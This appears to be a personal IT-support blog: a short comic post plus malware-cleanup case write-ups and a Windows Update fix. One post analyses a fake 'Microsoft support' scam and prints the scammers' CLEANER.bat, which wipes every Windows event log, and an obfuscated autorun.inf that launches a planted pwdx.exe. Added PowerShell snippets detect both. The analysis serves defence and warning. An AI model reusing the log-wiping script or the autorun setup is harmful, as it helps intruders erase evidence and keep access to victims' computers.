
Monday, February 3, 2020

TheSuperAdmins #006: No Computer Virus

With the Coronavirus becoming a big topic in the news, our IT department is also more or less aware of it...





After a long time I could make another little comic, I hope the next one doesn't take that much time! Anyway, thanks for reading and I hope you enjoyed!

Tuesday, May 29, 2018

Fixing HDD and CPU always up to 100%

Today I could fix a case where a computer got incredibly slow over the years, but it took checking lots of points...

First of all, it was initially hard to figure out where the issue was coming from.

Either the HDD in the Task Manager went up to 100% or the CPU - or both together. Even when no application was started. Narrowing down which service or application was at fault was difficult as well, since it was always a different one.

So I first tried the 'obvious' solution which you find quite often online: switching off services like 'Windows Search' or 'Superfetch'. Initially it seemed like no change at all. I even checked the hard disk, since I found sites where users were claiming to have issues with the Toshiba DT01ACA100. But the HDD was fine so far, nothing visible with checking tools.

So what else... Such issues can come through viruses or malware, so I gave Malwarebytes AntiMalware another go. And it found more than 4000 suspicious entries! After clearing them all and going for another reboot, I let the software run through again to check if the malware was really gone, and suddenly the issues got fewer!

Surely, right after booting the computer still took a while to 'calm down' in terms of processor and hard disk usage. But then you could finally reproduce it by opening the Firefox browser and opening certain websites. Or starting MS Office software.

Generally, websites using Flash pushed the scale high again. After certain tests to fix that issue within Firefox failed, I tried the same with Google Chrome, which was faster and slightly better.

And now after several restarts the computer finally seems fine again - hopefully it remains!



Tuesday, November 14, 2017

Chinese Tencent Software Removal

Suddenly you see a piece of Chinese software popping up in your taskbar. But what is it and how do you get rid of it?

The user who contacted me had previously tried to install a certain piece of software by using a crack, which seemingly failed and installed this 'tool' instead.


It caused lots of unnecessary pop-ups in the browser and slowed down the system in general.

But the good news is that you can get rid of it. The bad news is, it's all in Chinese, and if you don't know that language it could be difficult.

For me, knowing a bit of Japanese helped to figure out a few characters. For example, 出 means something like 'leave' or 'go out', which helped to close the software in the taskbar.

Once it's closed, you can proceed with uninstalling the software.



Once it's closed, you need to go to the folder as seen in the screenshot above and scroll down to find a file called uninst.exe.
In the next step you need to be cautious in what you select:

  • Seeing the next window, select the left option (not the green one!)
  • At the next orange window you see three checkboxes - select the last one and proceed with clicking on the red button
  • A last checkbox appears and there you should select the left button to complete the uninstall process
After a reboot it should all be fine again, but better check in the Control Panel under 'Programs & Features' if there's anything left (mostly at the bottom of the list, written in Chinese). Try to uninstall other possible software like this as well.

Moreover, I would also suggest scanning the device for possible malware remnants - my recommendation is Malwarebytes Anti-Malware.

So, try to stay free of certain software in the future!

Sunday, January 1, 2017

Windows 10 flashing at the start, but why?

You start your Windows 10 and your desktop is flashing, flickering or, let's say, just becoming black; your desktop icons are disappearing and coming back every few seconds.

The only thing that might work is your Task Manager by pressing CTRL + ALT + DEL. Everything else in the background is gone and appearing again. It all looked like this:



It's all pretty annoying. A solution to have a booting scenario without all of this could be using Safe Mode. It might be hard to get there at all, but if you manage to go to 'Run' and type 'msconfig' you can select Safe Mode for the next restart. Within this mode I experienced none of this disturbing flashing.

I often read that it's caused by the upgrade from Windows 7 or 8 to Windows 10. But in my case it was something else. Someone had installed a certain suspicious 'driver updater' before the issue occurred. I removed the software of course, but the problem remained. I reinstalled a few drivers, but it didn't help. A malware scan with Malwarebytes Antimalware found more than 350 infections and cleaned them away, but the issue was still there. I found certain batch scripts while looking for a solution, but they didn't work either.

In general this issue is caused by a specific software or driver. But you have to find it to fix it.

So I reinstalled Windows 10, which made the most sense since the computer only had a bit of basic software installed and that was it. Saved the data, copied it back. Done. No issues anymore. The fastest and best way in cases like this.

Friday, December 16, 2016

Project Acer Aspire 5742g - First can't boot, then no AntiVirus

Someone brought me a laptop recently which wasn't able to boot anymore. The issue was solved easily, but after rebooting there was more...

It's all about an Acer Aspire 5742g, around five years old. The computer stopped at the BIOS boot screen with the option 'Press <F2> to enter Setup'. Windows didn't boot anymore - at every attempt.

But you could still enter the BIOS and change settings without any freezing or anything. So I took a Live Windows and booted it from the DVD drive - and it worked. I tested some HDD tools and it was all fine; I also had access to the data, no problem. But it still couldn't boot at all.

Then I opened the laptop and disconnected the hard disk from its cables to take it out for a few minutes. I couldn't see anything unusual and returned the hard disk to the laptop. I turned the laptop on again and it suddenly worked; Windows 7 was able to boot.

After a few more starts the issue didn't occur again (even weeks later no problem), but I found out that the anti-virus software wasn't running anymore. And for how long? The owner didn't know. The laptop was also filled with lots of software the user wasn't aware of.

A virus scan with Malwarebytes AntiMalware showed more than 300 infections and we agreed to save the data and reinstall the machine. Better safe than sorry.

Wednesday, December 30, 2015

Addonjet and a.karmakitty.info

What a crap...
Another case of malware cleaning shows how to get rid of the annoying karmakitty pop-ups in Google Chrome and unwanted ads by Addonjet.

The computer is infected with malware and the web browser can't be used properly anymore. In every step you take another pop-up appears, wanting you to call a phone number. In my case the problems only occurred on Google Chrome.


Possible browser extensions which were also responsible for this couldn't be removed anymore. The settings menu closed when you attempted to open the extension list. Clearing the cache didn't help to solve this.

And there was no unwanted software installed, so the fastest and most effective way was to run a complete malware check. I recommend Malwarebytes Anti-Malware, which found a lot of infections.
After the clean-up and restart the whole issue was solved. Make sure your antivirus software is working properly, or maybe get a better one.

Tuesday, December 8, 2015

A call from Microsoft 'to fix the issue'

Sometimes you hear stories about scammers pretending to work for Microsoft who are trying to get access to a private computer. Their victims are gullible people who are called directly at home. Lately I got to see a Windows 7 system where such a 'helpdesk guy' had access...

It all starts with a phone call where these guys say they're from Microsoft and there's an issue on the computer to be fixed.

Interestingly, they are even calling people in Germany while only speaking English and just a bit of German.

In case of comprehension problems they used internet translation tools to move forward, and they always said that if this procedure costs something, they would say so (as seen later...).

Getting access

To show the people that they're trustworthy they mention a combination of numbers and later show them the exact same digits somewhere on the computer. I don't know which numbers, but obviously a combination which is the same on all Windows machines.

To get access they let their victims go to https://showmypc.com to download a remote support tool. This tool apparently includes a service and a version of TightVNC.

Additionally they are using the tool "LogMeIn Rescue" (https://secure.logmein.com) for file transfer. Then they copy a txt file to the desktop with the following three lines to 'prove' they're real:
My Name = Christopher winter
My Employee ID = MS98646
Our Email Address = support@microsoft.com

The 'cleaning'

During this remote session the tool ATF Cleaner was copied to the computer. According to the website (www.atribune.org) this software is from 2006 - so for Windows 2000 and Windows XP. There are extra notes added for the support of Windows Vista.

The tool is just able to delete the cache of Firefox and Opera. Considering its age, the only reason for using this exe must be to distract from something. Maybe from the batch file which was copied and executed shortly afterwards - name: CLEANER.bat.

Correct me if I'm wrong, but its purpose is to get admin access and delete the event logs.
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

At that point the fake support guy said that he wanted to install a special cleaning software for around 90 euros. He couldn't send an email or other information material. It was just about installing it now or not. After that the user of the computer ended the call.

The CLEANER.bat wasn't deleted properly, because I found it in the Recycle Bin. But the event log was starting afresh...
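Wiping the logs with wevtutil is itself recorded: clearing the Security log leaves Event ID 1102 in the Security log, and clearing any other log leaves Event ID 104 in the System log, both from the Microsoft-Windows-Eventlog provider. The following check is an added example, not part of the original post; it assumes an elevated PowerShell 3.0 or later session on the affected machine.

```powershell
# Added example: find log-clearing events left behind by a script like CLEANER.bat.
# Event ID 1102 (Security log) = "The audit log was cleared."
# Event ID 104  (System log)   = "The <Channel> log file was cleared."
# Reading the Security log requires an elevated session.
function Get-LogClearEvents {
    param([int]$Days = 30)
    $since = (Get-Date).AddDays(-$Days)
    $filters = @(
        @{ LogName = 'Security'; Id = 1102; StartTime = $since },
        @{ LogName = 'System';   Id = 104;  StartTime = $since }
    )
    foreach ($f in $filters) {
        # Get-WinEvent raises a non-terminating error when nothing matches; treat that as "none".
        Get-WinEvent -FilterHashtable $f -ErrorAction SilentlyContinue | ForEach-Object {
            $xml  = [xml]$_.ToXml()
            $data = $xml.Event.UserData.LogFileCleared   # both IDs record the actor under UserData
            $cleared = if ($_.Id -eq 104) { $data.Channel } else { 'Security' }
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Log     = $f.LogName
                Id      = $_.Id
                Account = "$($data.SubjectDomainName)\$($data.SubjectUserName)"
                Cleared = $cleared
            }
        }
    }
}

# The oldest surviving record shows how far back the history still reaches;
# if it is only minutes old, everything before it is gone.
function Get-OldestEventTime {
    param([string]$LogName)
    $e = Get-WinEvent -LogName $LogName -Oldest -MaxEvents 1 -ErrorAction SilentlyContinue
    if ($e) { $e.TimeCreated } else { $null }
}

Get-LogClearEvents -Days 30 | Sort-Object Time | Format-Table -AutoSize
foreach ($log in 'Security', 'System', 'Application') {
    "{0,-12} oldest record: {1}" -f $log, (Get-OldestEventTime -LogName $log)
}
```

Because CLEANER.bat clears every log in turn, entries for logs wiped before the System log are lost with it; the 1102 in the Security log and the 104 entries written after the System log was cleared are what survives.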

Further traces

In 'Run' (Windows+R) I found the following commands which were last used: 

iexplorer support.me (leads to https://secure.logmeinrescue.com/Customer/Code.aspx)
services.msc
eventvwr
certmgr.msc
prefetch
winver
msconfig

Looking for further hints of what had been done, I saw two suspicious files whose modification time was exactly at the end of the time when the 'support' had access. In the root folder of the second hard drive is a pwdx.exe and an autorun.inf which should open the exe file (see below).

;wnylejSrKiV rQxf eiYqRlldTudXghdrnqmBjyIgAeaGLphfkBfnuegSkajgEnux
;
open= pwdx.exe
;
sHeLL\exPLOre\COmmanD = pwdx.exe
;fLeR
shell\OpeN\cOmmAND=pwdx.exe
;
sHElL\AutOpLay\cOmmand =pwdx.exe
[AutoRun]
;
shell\opEN\DeFaULt=1
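The file above hides what it launches behind random-case keys, stray spaces around '=', ';' comment lines and a section header placed after the keys. This parser is an added example, not part of the original post; it assumes PowerShell 3.0 or later, and the sample is the page's own autorun.inf with the first comment line shortened.

```powershell
# Added example: pull the executables an autorun.inf would launch, tolerating the tricks
# used above (random-case keys, spaces around '=', ';' comment lines, a late [AutoRun] header).
function Get-AutorunTargets {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        $t = $line.Trim()
        if ($t -eq '' -or $t.StartsWith(';') -or $t.StartsWith('[')) { continue }  # comment/section
        $idx = $t.IndexOf('=')
        if ($idx -lt 0) { continue }
        $key = $t.Substring(0, $idx).Trim().ToLowerInvariant()   # sHeLL\exPLOre\COmmanD -> shell\explore\command
        $val = $t.Substring($idx + 1).Trim()
        # keys that name something to execute: open, shellexecute, shell\<verb>\command
        if ($key -eq 'open' -or $key -eq 'shellexecute' -or $key -like 'shell\*\command') {
            [pscustomobject]@{ Key = $key; Target = $val }
        }
    }
}

# Constructed sample: the autorun.inf quoted above, first comment line shortened.
$sample = @'
;wnylejSrKiV rQxf
;
open= pwdx.exe
;
sHeLL\exPLOre\COmmanD = pwdx.exe
;fLeR
shell\OpeN\cOmmAND=pwdx.exe
;
sHElL\AutOpLay\cOmmand =pwdx.exe
[AutoRun]
;
shell\opEN\DeFaULt=1
'@

Get-AutorunTargets -Lines ($sample -split "`r?`n") | Format-Table -AutoSize
# -> open, shell\explore\command, shell\open\command, shell\autoplay\command, all pointing at pwdx.exe

# Check the root of every file-system drive, as was done with the second HDD above.
function Find-RootAutorun {
    foreach ($d in Get-PSDrive -PSProvider FileSystem) {
        $p = Join-Path $d.Root 'autorun.inf'
        if (Test-Path -LiteralPath $p) {
            Get-AutorunTargets -Lines (Get-Content -LiteralPath $p) |
                Select-Object @{ n = 'Path'; e = { $p } }, Key, Target
        }
    }
}
Find-RootAutorun | Format-Table -AutoSize
```

Windows 7 and later no longer honour autorun.inf on hard disks and USB sticks by default, so on such a system the file is an indicator of what was planted rather than something that runs on its own.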

About the pwdx.exe I'm not sure what that exactly is. I only found the information that it might be a Linux-based monitoring tool. Please comment if you know more.

Anyway, the computer was filled with these virus warning windows as seen on the right. And there was also a warning message from the internet service provider the next day.

During the time the session was running, anything could have been done. These are just the few things I've found in a short amount of time.

After this event the computer wasn't connected to the internet anymore. A reinstallation was more than necessary...

Note: If anybody knows more about these fake helpdesk people or has his or her own experiences with it, feel free to comment.

Sunday, December 6, 2015

Windows Updates not working after malware cleanup

A Windows 7 computer was infected with some viruses, malware etc., and after a successful cleaning procedure one visible problem remained: Windows Update is not working anymore.

While trying to search for further updates the following message appeared:

Windows Update cannot currently check for updates because the service is not running.

But the service is definitely running. To fix this, the following steps need to be done:

1. Open services.msc (or go to computer management) to stop the Windows Update service.

2. Go to C:\Windows and rename the folder "SoftwareDistribution" to something like "SoftwareDistribution_old".

3. Restart the Windows Update service and restart the computer. The folder will be recreated.

4. Go to Windows Update again and search for updates. This time you're offered to install "New Windows Update software". Confirm it.

5. Following that, the search for updates seems endless, only to end up with error messages like these two: 0x80072EE2 or 0x8007000E. It won't continue.

And there they are...
6. So now go to Internet Explorer, open the options and reset the settings and cache completely. Restart your computer and all of a sudden the updates will appear.
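Steps 1 to 3 can be done in one go from an elevated PowerShell (3.0 or later) instead of clicking through services.msc and Explorer. This is an added example, not from the original post; the service names wuauserv and bits and the rundll32 reset command are standard Windows components, the timestamped folder name is my own choice.

```powershell
# Added example: steps 1-3 of the fix above as a script, for an elevated PowerShell on Windows 7.
# The folder is renamed rather than deleted, so its content can be put back if anything goes wrong.
function Reset-WindowsUpdateCache {
    $sd      = Join-Path $env:SystemRoot 'SoftwareDistribution'   # C:\Windows\SoftwareDistribution
    $stamp   = Get-Date -Format 'yyyyMMdd_HHmmss'
    $newName = "SoftwareDistribution_old_$stamp"                  # unique, so the script can be rerun

    # Step 1: stop the Windows Update service (wuauserv). BITS (bits) downloads into the
    # same folder, so it is stopped as well to make sure nothing keeps files open.
    Stop-Service -Name wuauserv, bits -Force -ErrorAction Stop

    # Step 2: rename the folder; Windows recreates an empty one when the service starts.
    if (Test-Path -LiteralPath $sd) {
        Rename-Item -LiteralPath $sd -NewName $newName -ErrorAction Stop
    }

    # Step 3: start the services again; the reboot from the original procedure still follows.
    Start-Service -Name bits, wuauserv
    [pscustomobject]@{
        Renamed = (Join-Path $env:SystemRoot $newName)
        Status  = (Get-Service -Name wuauserv).Status   # confirms the service really is running
    }
}

Reset-WindowsUpdateCache

# Step 6 (after the restart and the failed search with 0x80072EE2 / 0x8007000E): the same reset
# that Internet Explorer's options dialog offers, opened from the command line.
# Start-Process -FilePath rundll32.exe -ArgumentList 'inetcpl.cpl,ResetIEtoDefaults'
```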

Anyway: after such virus problems there can be several other things damaged in the operating system. The safest and most recommended way would be to save the data and reinstall the OS. This is just a quick fix to get Windows Update working again.